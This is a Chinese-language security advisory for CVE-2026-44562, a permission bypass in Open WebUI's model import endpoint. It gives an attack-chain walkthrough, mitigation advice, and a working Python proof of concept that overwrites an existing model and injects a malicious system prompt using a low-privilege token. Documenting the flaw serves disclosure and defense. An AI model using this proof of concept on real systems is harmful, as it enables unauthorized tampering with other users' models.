CVE-2026-44562 CVSS 6.5 中危

CVE-2026-44562 Open WebUI 模型导入权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44562

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI 0.9.0之前版本存在权限绕过漏洞。拥有workspace.models_import权限的用户可通过POST /api/v1/models/import接口，利用模型ID匹配机制覆盖数据库中任意现有模型。该漏洞因缺乏所有权验证及未调用filter_allowed_access_grants函数，导致访问控制失效，攻击者可篡改任意模型数据。

技术细节

该漏洞源于Open WebUI的模型导入功能未实施严格的所有权检查。当攻击者向/api/v1/models/import端点发送POST请求时，系统仅验证请求者是否具备workspace.models_import权限。若导入数据中的ID与现有模型ID一致，后端会直接将攻击者提供的负载数据合并写入数据库，且未调用用于检查访问授权的filter_allowed_access_grants函数。这使得低权限用户能够覆盖不属于其拥有的模型（包括系统模型），从而绕过正常的访问控制机制，破坏系统数据的完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者枚举系统中的现有模型，获取目标模型的ID（如 'llama3'）。

STEP 2

2. 获取凭证

攻击者注册或登录获取一个具有 'workspace.models_import' 权限的低权限用户令牌。

STEP 3

3. 发起攻击

攻击者构造包含目标模型ID和恶意数据的POST请求，发送至 /api/v1/models/import 接口。

STEP 4

4. 数据覆盖

后端验证基础权限后，因未校验所有权，直接将恶意数据合并覆盖原模型数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration
target_url = "http://target-domain.com/api/v1/models/import"

# Headers with a low-privilege token that has 'workspace.models_import' permission
headers = {
    "Authorization": "Bearer <ATTACKER_TOKEN>",
    "Content-Type": "application/json"
}

# Malicious payload targeting an existing model ID to overwrite it
malicious_payload = {
    "id": "target-model-id", 
    "name": "Hijacked Model",
    "params": {
        "system": "Injected malicious system prompt"
    }
}

# Send exploit request
response = requests.post(target_url, headers=headers, data=json.dumps(malicious_payload))

if response.status_code == 200:
    print("[+] Exploit successful: Model data overwritten.")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

建议立即升级至修复版本。如无法升级，应严格限制普通用户对模型导入接口的访问，通过WAF规则拦截针对 /api/v1/models/import 的非管理员请求，并加强数据库模型变更的审计日志监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表